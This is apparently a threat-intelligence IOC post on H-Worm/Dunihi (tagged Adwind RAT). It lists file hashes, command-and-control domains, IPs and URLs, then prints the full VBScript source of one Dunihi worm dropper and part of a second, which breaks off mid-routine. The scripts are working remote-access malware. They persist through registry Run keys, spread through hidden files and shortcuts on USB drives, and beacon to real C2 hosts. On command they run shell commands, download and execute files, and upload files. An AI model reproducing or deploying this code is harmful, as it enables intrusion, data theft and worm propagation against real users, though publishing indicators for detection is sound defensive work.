- #H-Worm #Dunihi #Adwind #RAT
- ---------------------------------
- 21-01-2019 IOCs
- ---------------------------------
- Main object: "9ed6f79853efcec2c6e17bb7def042f2b4373519b56f7b437ed85cf8d260b7cc.bin.gz"
- sha256 8f8e8b167a3a34c8bf4a99e2d0db589e6608a3789a7fc7deb3dfdc785de1e9cc
- sha1 d573a1d7482f9d8ad1b85725e1cc58c2034b3fdf
- md5 4a596594f3efc17edf98ad162f87e0cf
- Dropped executable files
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\awt.dll e5d4fc7d47a38a389884af1ea5f06f7c61c5cde6afc154a23a3cb5a127da1e34
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\decora_sse.dll adf4e9ce0866ff16a16f626cfc62355fb81212b1e7c95dd908e3644f88b77e91
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\dt_shmem.dll c417390f681276ec0d55d81a91b87eae75ca245045f5c23e9b43550b708fb1a6
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\deploy.dll bff79fb05667992cc2bda9bae6e5a301baf553042f952203641ccd7e1fc4552d
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\eula.dll dec4f2f32edc45f70e7119c9e52c4cef44bb9aa627dbec1ee70f61d37468556b
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\glass.dll a92df0e1f93e29fae427da766d9b91bda4b421e6ab86aeb9cdd060b218028d35
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\fontmanager.dll 20bef5bcd523cff21bad585af91d1c913d5535a6b20ac70f5f3d8dafb2f90f25
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\fxplugins.dll 1c78673777d1d48bf9e1e247bc64231817dccec4b08cc5e8c7a7fc5ae1f32501
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\dcpr.dll 80111e1d706741f5ef7f661835c3aa46664666425aa1b5f93103410f2bee1213
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\dt_socket.dll f0fd0268d6e410c05e7ee71ad9c96744cd5e4a97329f608041d7078faee24ed0
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\bci.dll 7945365a3cd40d043dae47849e6645675166920958300e64dea76a865bc479af
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\msvcp120.dll 87c42ca155473e4e71857d03497c8cbc28fa8ff7f2c8d72e8a1f39b71078f608
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\klist.exe 298d8e2730a3dbe942ebe0379f7303bb2872fd7f05746851e47ed7588f541477
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\keytool.exe 8c40c13f83ea7c95b441548a455b57edac019b1cbfd6c6a068ddad33a6476ff1
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\ktab.exe e89fe9520bcedbba20b5773598fb15e90dc828be7691adaa9d887ca585046aad
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\msvcr120.dll 86e39b5995af0e042fcdaa85fe2aefd7c9ddc7ad65e6327bd5e7058bc3ab615f
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\mlib_image.dll bb13a4ea915965aca971da50d9b90cbc0a32c99900eb585c6e9e12232b448fef
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\lcms.dll e179ace7a6d6cffeb7540d67ef56d86a96cd16c421154b0a8b499722a4e957d9
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\management.dll 035121aee1e7f257c582837e1a0bd2e240bc1d1a791354a803e5fa165be22d87
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\msvcr100.dll 60c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\kinit.exe 7cc34a5423bd3fc9fa63d20ebece4103e22e4360df5b9caa2b461069dac77f4d
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jaas_nt.dll e700d076614943e138b69f4a1f177914225ca35b93fed8b43bc4a86cfd87c59c
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\hprof.dll cc82beaa275f4ed4c33b694154bebc5fd097ada50072201d250aed3f269a41b6
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\net.dll 6d9bd64084180b7f1b7aa4902372879dc0400905856ac0c229ad33218f3257f1
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\nio.dll fb537564d240ac9b730941b5c0966209a5857e4d3ec0582ba0443fe391c74294
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\policytool.exe d81308da68136fd421eb56fa2b586ec6801ccf0827d85f495227e6d6c40fc69e
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\npt.dll 9145cb3b7fe40237e5c980404ade4c862d48e2d644aeba0006ec3a6f3e9505b5
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\pack200.exe 3047b67b36aee78b669fdedfe423e750b125837d92abcdc06983c34c65db71fc
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\orbd.exe 0f8cae56647464d75d2530cc9f7205c69911fced55e43a39d86ff4d435a018ed
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\prism_common.dll 5264316be4820cbc940e0c277698e6f95ec99a52023e5ef85c3fbe624b45cdaf
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\glib-lite.dll 465541ef4e9337108b375984c23f5d31e6c060fed16820bb9bc5af79a2109eac
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\prism_sw.dll 3f976b7efc9fe59abfe0bcde0d3b5af1cf133c64ad1508cb4a00cf2c104f5e81
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\gstreamer-lite.dll 379a14d561afeb364f8902c0b5193da229882c6273f2793339e1ad682af516f4
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\prism_d3d.dll f9108ac2555dbc5a6b43cc9504394089be60eae4127397dc651e06b3e7585b00
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\j2pkcs11.dll 91b6e445f5b4510c9d66641b1eed925f54dc2e84f3ddb0ff16ed5b0ac4bdc977
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jabswitch.exe a764db727ed6ec056ffe163dbb83db0ad0bd15b83181288c3afcd17a35e7d587
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\java.exe df24b51772ff4959e9bbfe481f72f0e88ba6e7c031d60edb3b1a47c69f69a6d0
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javacpl.exe e7521e54f241e99bb5f7f2de1cd2fc49f3980dc43eb6c5b8fa251178f03616ef
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javafx_font_t2k.dll 33fe38e43821c7e7d3b46317fab571926174492affd576f6ecd06bffe7a7c1b7
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\j2pcsc.dll 7a9f32ecba3dcaeb653293780812969e2534da7b8e652a24e56271cd088c7a36
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\JavaAccessBridge.dll ed68df1e549a092674259b1f806a31839ca426572020a7dbe0c46e492b272ec9
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javacpl.cpl e3259bb7ef907c0bb74e192e40e57fdf96c903bbc580975348dfef42839669ff
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javafx_font.dll eada27806ccbf4d015f35f369b6880ef3dcc2eaa3b1ca89546fbdba8b05d9b5c
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\java.dll 30a048a35865ca5bcea35ebecf7f01f08e8d20b0c4a3e9e0132540815eda1d89
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\java-rmi.exe 2ba8cd9a3757ecf0b8b7de612d7f827de73f7e9da114b1979fe9d429a46f8109
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\instrument.dll 1a1d2c51b3db4507e4a4ad3e5afb6728e69acf9905d3df7c9dc5adbe83f7e96e
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\java_crw_demo.dll b34e72996d2c1a9b74a932c6259256b9001b73b3e7ef8c484afb61ff2517fba3
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jawt.dll b11633c87ac49873d1e8ef5bcf9335dbe0579f483b5c745c0034f79b3fd0ae8c
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jfxmedia.dll e62ec519aff414c1a81aeeb4cbf6de348b3b52ae527f14cedd42449e61fb1548
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\JAWTAccessBridge.dll 8019cd10ef1a1ddae179364934d1a0304cfcfc67be2dd7bca4ee8def93a89ef4
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javaw.exe 11054aa4170990ad1d345a2caf15285f3157e4bf240015cc20431b7373a52fc2
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javaws.exe 3514c54f5d552b2cb64b9e2f8d8c5f65807e1d49fe82689a16f6a3e7521fb437
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javafx_iio.dll e880cd6207c687437dd2ca60008ea375bd99b1c07075674cad1052f41b631a97
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jfr.dll 28da2d3e61a12408b8d9f86398f9c78f551e48404bd2c7bdccd8cbd74ed5e5a3
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jdwp.dll f9a0e87300c8d094bb45834dd128e70a49d6d5d2cef20133411a769c01195c04
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jp2launcher.exe d8e40564694d5a2fdd85ab5345d8589e637e387d59160a74737832670da01597
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jjs.exe c4916ed2eefc2ae2394625691f5550142eda6cb33e5e713d1e203b76b2141509
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jp2iexp.dll 5cd202cd92f33cbad11898331dec0791bf0bccf8ddf22849942debde007c3317
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\rmid.exe 6513c40184d496e86e34e327c960b06d20900c3092084a708d890f5376c43cf5
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jpeg.dll 8cf3344453c02bf21ff8c79a6189f25617ca38cee2632766d0aa4ee07277bc25
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jli.dll 45c6aa5006ebaf8ab63f26134f2753bf4f20497942de58bc734e437e2d0f32f6
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\resource.dll 15b4fdfe5ddb1820ddc468ac5d0e65045ca6aaea21d3a5a66ecaa8fc1ce48835
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\kcms.dll 0ecd837ae93404f0aacfa6efc20f3c3ce6d1ae683e60a1c8873f07bfc8f93dc4
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jp2ssv.dll e5328bcaec7fdba85097c04d5f4f35f648753b3378fb1d9ee6ce6965b9562e90
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jp2native.dll f5faf9f49ca7f199f572e4227896ae839596cc9f6039875f3fa3a0eaddc40084
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jsoundds.dll b534c43f203c5502e43a5d0fdbfbd9422de342aade635009fab791eb82f3c020
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\splashscreen.dll a6ea1b705acdda1bb3cd1c3cdcbfe7c86c81654537db8b48f65a781578ffbd77
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\verify.dll 266d7992f7518b7cda33ba5251b0636b00ee13e6b17021311dcc1ba4dd2fc705
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\ssv.dll 5eb2d05ffc733e7ec63cb271201f87c7724793e5b92b875551ced1cebb505f3f
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jsound.dll 5303366d9447a7610bd971339f27333767d399fca0a3f01154b082d47bd0a46e
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\ssvagent.exe 4ada2d738b490cc63f3c18f151239dfde615af8a4eaf44b8021642ff9a25b8f2
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\unpack200.exe a6316854fe790d22e6264ee3abc3be49686e6e36299c9718be9a20bb3e9fb185
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\unpack.dll 2864b031237c6a68eedab256732e43558b5741ae4f68a07a068438469ad907d9
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\servertool.exe bbe145615886dbb3f4ada7617d1a15fe2aee6cea5dbe34e9c216d1bde1121891
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\zip.dll 9a7251883229ccc36859b02894b541a369c2426a9b5cbdc7e8a10db36f13451e
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jsdt.dll fe5d22121d6a683bb87b362da85cabf8aead1c171d347d0a16da64c74dd8a3bc
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\t2k.dll d66f567fc2a33434063731832719cad75418c619dd30dcf6c339d2d3da32c7bb
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\WindowsAccessBridge.dll 699e5ff6df1060df61a32e99c8fc52837f40f774bfa88136af10036f4dd4a578
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\tnameserv.exe 9f37d44545726fb5aeb03285d3866266322b833cd1a1fde340497c7d9358f775
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\sunmscapi.dll 9c235bbfa97e6a8fc7e09a4ac12f84c8ed8855998410e96dd44e1b64ef951a80
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll 161f737f9c90e67f0fb80e7cd9d6823f83bdd1d971108faa99c6088c278a4f2a
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\wsdetect.dll a78345586e443e0adc6554951946ad874f61ba2ff724fa8121df546a4b21df4a
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\rmiregistry.exe ba2d5038501cf3f3a31616a122f6cd2554d13219e717ef89c6aa1a07eb1cc145
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\sunec.dll 23b40cf8e64e1a262ef9ff5b9e01246c082eeaa6039b4b05f92e1bd536bd7166
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\client\jvm.dll 156afc715e865695ddf69d4a7db5fea2023b39748febfd86add15e9498c26639
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll adaaa9037be30c708865a6627df9c0e43acf93d100469e5fdf83f632d2fe1829
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll 62248d7ab742e200996bf87433b4e8478e4d8bcfbc0a2ee7cbe3a5a62f6268c3
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll d1deaa4b7feebfeed58eda969c9fb9bc5791ad7e67f47c596280375cbda3f46f
- sha256 C:\Users\admin\AppData\Local\Temp\Windows8381702355763314501.dll a6be5be2d16a24430c795faa7ab7cc7826ed24d6d4bc74ad33da5c2ed0c793d0
- DNS requests
- domain freshguys.ddnsking.com
- domain xtkd.ddns.net
- Connections
- ip 194.5.99.53
- ip 113.11.252.97
- HTTP/HTTPS requests
- url http://freshguys.ddnsking.com:5674/is-ready
- url http://xtkd.ddns.net:3233/is-ready
- url http://freshguys.ddnsking.com:5674/is-sending%3C%7C%3EC:/Users/Business/Desktop/adk.jar
- -------------------------------------------------------------------------------------------------------------
- [1st .VBS dropper]
- -------------------------------------------------------------------------------------------------------------
- [Dunihi]
- 'pashinta
- host = "freshguys.ddnsking.com"
- port = 5674
- installdir = "%temp%"
- lnkfile = false
- lnkfolder = false
- dim shellobj
- set shellobj = wscript.createobject("wscript.shell")
- dim filesystemobj
- set filesystemobj = createobject("scripting.filesystemobject")
- dim httpobj
- set httpobj = createobject("msxml2.xmlhttp")
- installname = wscript.scriptname
- startup = shellobj.specialfolders ("startup") & "\"
- installdir = shellobj.expandenvironmentstrings(installdir) & "\"
- if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
- spliter = "<" & "|" & ">"
- sleep = 5000
- dim response
- dim cmd
- dim param
- info = ""
- usbspreading = ""
- startdate = ""
- dim oneonce
- on error resume next
- instance
- while true
- install
- response = ""
- response = post ("is-ready","")
- cmd = split (response,spliter)
- select case cmd (0)
- case "excecute"
- param = cmd (1)
- execute param
- case "update"
- param = cmd (1)
- oneonce.close
- set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
- oneonce.write param
- oneonce.close
- shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
- wscript.quit
- case "uninstall"
- uninstall
- case "send"
- download cmd (1),cmd (2)
- case "site-send"
- sitedownloader cmd (1),cmd (2)
- case "recv"
- param = cmd (1)
- upload (param)
- case "enum-driver"
- post "is-enum-driver",enumdriver
- case "enum-faf"
- param = cmd (1)
- post "is-enum-faf",enumfaf (param)
- case "enum-process"
- post "is-enum-process",enumprocess
- case "cmd-shell"
- param = cmd (1)
- post "is-cmd-shell",cmdshell (param)
- case "delete"
- param = cmd (1)
- deletefaf (param)
- case "exit-process"
- param = cmd (1)
- exitprocess (param)
- case "sleep"
- param = cmd (1)
- sleep = eval (param)
- end select
- wscript.sleep sleep
- wend
- sub install
- on error resume next
- dim lnkobj
- dim filename
- dim foldername
- dim fileicon
- dim foldericon
- upstart
- for each drive in filesystemobj.drives
- if drive.isready = true then
- if drive.freespace > 0 then
- if drive.drivetype = 1 then
- filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
- if filesystemobj.fileexists (drive.path & "\" & installname) then
- filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
- end if
- for each file in filesystemobj.getfolder( drive.path & "\" ).Files
- if not lnkfile then exit for
- if instr (file.name,".") then
- if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
- file.attributes = 2+4
- if ucase (file.name) <> ucase (installname) then
- filename = split(file.name,".")
- set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk")
- lnkobj.windowstyle = 7
- lnkobj.targetpath = "cmd.exe"
- lnkobj.workingdirectory = ""
- lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
- fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
- if instr (fileicon,",") = 0 then
- lnkobj.iconlocation = file.path
- else
- lnkobj.iconlocation = fileicon
- end if
- lnkobj.save()
- end if
- end if
- end if
- next
- for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
- if not lnkfolder then exit for
- folder.attributes = 2+4
- foldername = folder.name
- set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk")
- lnkobj.windowstyle = 7
- lnkobj.targetpath = "cmd.exe"
- lnkobj.workingdirectory = ""
- lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
- foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
- if instr (foldericon,",") = 0 then
- lnkobj.iconlocation = folder.path
- else
- lnkobj.iconlocation = foldericon
- end if
- lnkobj.save()
- next
- end If
- end If
- end if
- next
- err.clear
- end sub
- sub uninstall
- on error resume next
- dim filename
- dim foldername
- shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
- shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
- filesystemobj.deletefile startup & installname ,true
- filesystemobj.deletefile wscript.scriptfullname ,true
- for each drive in filesystemobj.drives
- if drive.isready = true then
- if drive.freespace > 0 then
- if drive.drivetype = 1 then
- for each file in filesystemobj.getfolder ( drive.path & "\").files
- on error resume next
- if instr (file.name,".") then
- if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
- file.attributes = 0
- if ucase (file.name) <> ucase (installname) then
- filename = split(file.name,".")
- filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
- else
- filesystemobj.deletefile (drive.path & "\" & file.name)
- end If
- else
- filesystemobj.deletefile (file.path)
- end if
- end if
- next
- for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
- folder.attributes = 0
- next
- end if
- end if
- end if
- next
- wscript.quit
- end sub
- function post (cmd ,param)
- post = param
- httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
- httpobj.setrequestheader "user-agent:",information
- httpobj.send param
- post = httpobj.responsetext
- end function
- function information
- on error resume next
- if inf = "" then
- inf = hwid & spliter
- inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter
- inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter
- set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set os = root.execquery ("select * from win32_operatingsystem")
- for each osinfo in os
- inf = inf & osinfo.caption & spliter
- exit for
- next
- inf = inf & "plus" & spliter
- inf = inf & security & spliter
- inf = inf & usbspreading
- information = inf
- else
- information = inf
- end if
- end function
- sub upstart ()
- on error resume Next
- shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
- shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
- filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
- filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
- end sub
- function hwid
- on error resume next
- set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set disks = root.execquery ("select * from win32_logicaldisk")
- for each disk in disks
- if disk.volumeserialnumber <> "" then
- hwid = disk.volumeserialnumber
- exit for
- end if
- next
- end function
- function security
- on error resume next
- security = ""
- set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
- for each objitem in colitems
- versionstr = split (objitem.version,".")
- next
- versionstr = split (colitems.version,".")
- osversion = versionstr (0) & "."
- for x = 1 to ubound (versionstr)
- osversion = osversion & versionstr (i)
- next
- osversion = eval (osversion)
- if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
- set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
- Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
- for each objantivirus in colantivirus
- security = security & objantivirus.displayname & " ."
- next
- if security = "" then security = "nan-av"
- end function
- function instance
- on error resume next
- usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
- if usbspreading = "" then
- if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then
- usbspreading = "true - " & date
- shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
- else
- usbspreading = "false - " & date
- shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
- end if
- end If
- upstart
- set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)
- set installfullnameshort = filesystemobj.getfile (installdir & installname)
- if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
- shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
- wscript.quit
- end If
- err.clear
- set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
- if err.number > 0 then wscript.quit
- end function
- sub sitedownloader (fileurl,filename)
- strlink = fileurl
- strsaveto = installdir & filename
- set objhttpdownload = createobject("msxml2.xmlhttp" )
- objhttpdownload.open "get", strlink, false
- objhttpdownload.send
- set objfsodownload = createobject ("scripting.filesystemobject")
- if objfsodownload.fileexists (strsaveto) then
- objfsodownload.deletefile (strsaveto)
- end if
- if objhttpdownload.status = 200 then
- dim objstreamdownload
- set objstreamdownload = createobject("adodb.stream")
- with objstreamdownload
- .type = 1
- .open
- .write objhttpdownload.responsebody
- .savetofile strsaveto
- .close
- end with
- set objstreamdownload = nothing
- end if
- if objfsodownload.fileexists(strsaveto) then
- shellobj.run objfsodownload.getfile (strsaveto).shortpath
- end if
- end sub
- sub download (fileurl,filedir)
- if filedir = "" then
- filedir = installdir
- end if
- strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
- set objhttpdownload = createobject("msxml2.xmlhttp")
- objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
- objhttpdownload.send ""
- set objfsodownload = createobject ("scripting.filesystemobject")
- if objfsodownload.fileexists (strsaveto) then
- objfsodownload.deletefile (strsaveto)
- end if
- if objhttpdownload.status = 200 then
- dim objstreamdownload
- set objstreamdownload = createobject("adodb.stream")
- with objstreamdownload
- .type = 1
- .open
- .write objhttpdownload.responsebody
- .savetofile strsaveto
- .close
- end with
- set objstreamdownload = nothing
- end if
- if objfsodownload.fileexists(strsaveto) then
- shellobj.run objfsodownload.getfile (strsaveto).shortpath
- end if
- end sub
- function upload (fileurl)
- dim httpobj,objstreamuploade,buffer
- set objstreamuploade = createobject("adodb.stream")
- with objstreamuploade
- .type = 1
- .open
- .loadfromfile fileurl
- buffer = .read
- .close
- end with
- set objstreamdownload = nothing
- set httpobj = createobject("msxml2.xmlhttp")
- httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
- httpobj.send buffer
- end function
- function enumdriver ()
- for each drive in filesystemobj.drives
- if drive.isready = true then
- enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
- end if
- next
- end Function
- function enumfaf (enumdir)
- enumfaf = enumdir & spliter
- for each folder in filesystemobj.getfolder (enumdir).subfolders
- enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
- next
- for each file in filesystemobj.getfolder (enumdir).files
- enumfaf = enumfaf & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter
- next
- end function
- function enumprocess ()
- on error resume next
- set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
- set colitems = objwmiservice.execquery("select * from win32_process",,48)
- dim objitem
- for each objitem in colitems
- enumprocess = enumprocess & objitem.name & "|"
- enumprocess = enumprocess & objitem.processid & "|"
- enumprocess = enumprocess & objitem.executablepath & spliter
- next
- end function
- sub exitprocess (pid)
- on error resume next
- shellobj.run "taskkill /F /T /PID " & pid,7,true
- end sub
- sub deletefaf (url)
- on error resume next
- filesystemobj.deletefile url
- filesystemobj.deletefolder url
- end sub
- function cmdshell (cmd)
- dim httpobj,oexec,readallfromany
- set oexec = shellobj.exec ("%comspec% /c " & cmd)
- if not oexec.stdout.atendofstream then
- readallfromany = oexec.stdout.readall
- elseif not oexec.stderr.atendofstream then
- readallfromany = oexec.stderr.readall
- else
- readallfromany = ""
- end if
- cmdshell = readallfromany
- end function
- --------------------------------------------------------------
- [2nd .VBS dropper]
- --------------------------------------------------------------
- '<[ recoder : houdini (c) skype : houdini-fx ]>
- '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- host = "xtkd.ddns.net"
- port = 3233
- installdir = "%temp%"
- lnkfile = false
- lnkfolder = false
- '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
- dim shellobj
- set shellobj = wscript.createobject("wscript.shell")
- dim filesystemobj
- set filesystemobj = createobject("scripting.filesystemobject")
- dim httpobj
- set httpobj = createobject("msxml2.xmlhttp")
- '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
- installname = wscript.scriptname
- startup = shellobj.specialfolders ("startup") & "\"
- installdir = shellobj.expandenvironmentstrings(installdir) & "\"
- if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
- spliter = "<" & "|" & ">"
- sleep = 5000
- dim response
- dim cmd
- dim param
- info = ""
- usbspreading = ""
- startdate = ""
- dim oneonce
- '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
- on error resume next
- instance
- while true
- install
- response = ""
- response = post ("is-ready","")
- cmd = split (response,spliter)
- select case cmd (0)
- case "excecute"
- param = cmd (1)
- execute param
- case "update"
- param = cmd (1)
- oneonce.close
- set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
- oneonce.write param
- oneonce.close
- shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
- wscript.quit
- case "uninstall"
- uninstall
- case "send"
- download cmd (1),cmd (2)
- case "site-send"
- sitedownloader cmd (1),cmd (2)
- case "recv"
- param = cmd (1)
- upload (param)
- case "enum-driver"
- post "is-enum-driver",enumdriver
- case "enum-faf"
- param = cmd (1)
- post "is-enum-faf",enumfaf (param)
- case "enum-process"
- post "is-enum-process",enumprocess
- case "cmd-shell"
- param = cmd (1)
- post "is-cmd-shell",cmdshell (param)
- case "delete"
- param = cmd (1)
- deletefaf (param)
- case "exit-process"
- param = cmd (1)
- exitprocess (param)
- case "sleep"
- param = cmd (1)
- sleep = eval (param)
- end select
- wscript.sleep sleep
- wend
- sub install
- on error resume next
- dim lnkobj
- dim filename
- dim foldername
- dim fileicon
- dim foldericon
- upstart
- for each drive in filesystemobj.drives
- if drive.isready = true then
- if drive.freespace > 0 then
- if drive.drivetype = 1 then
- filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
- if filesystemobj.fileexists (drive.path & "\" & installname) then
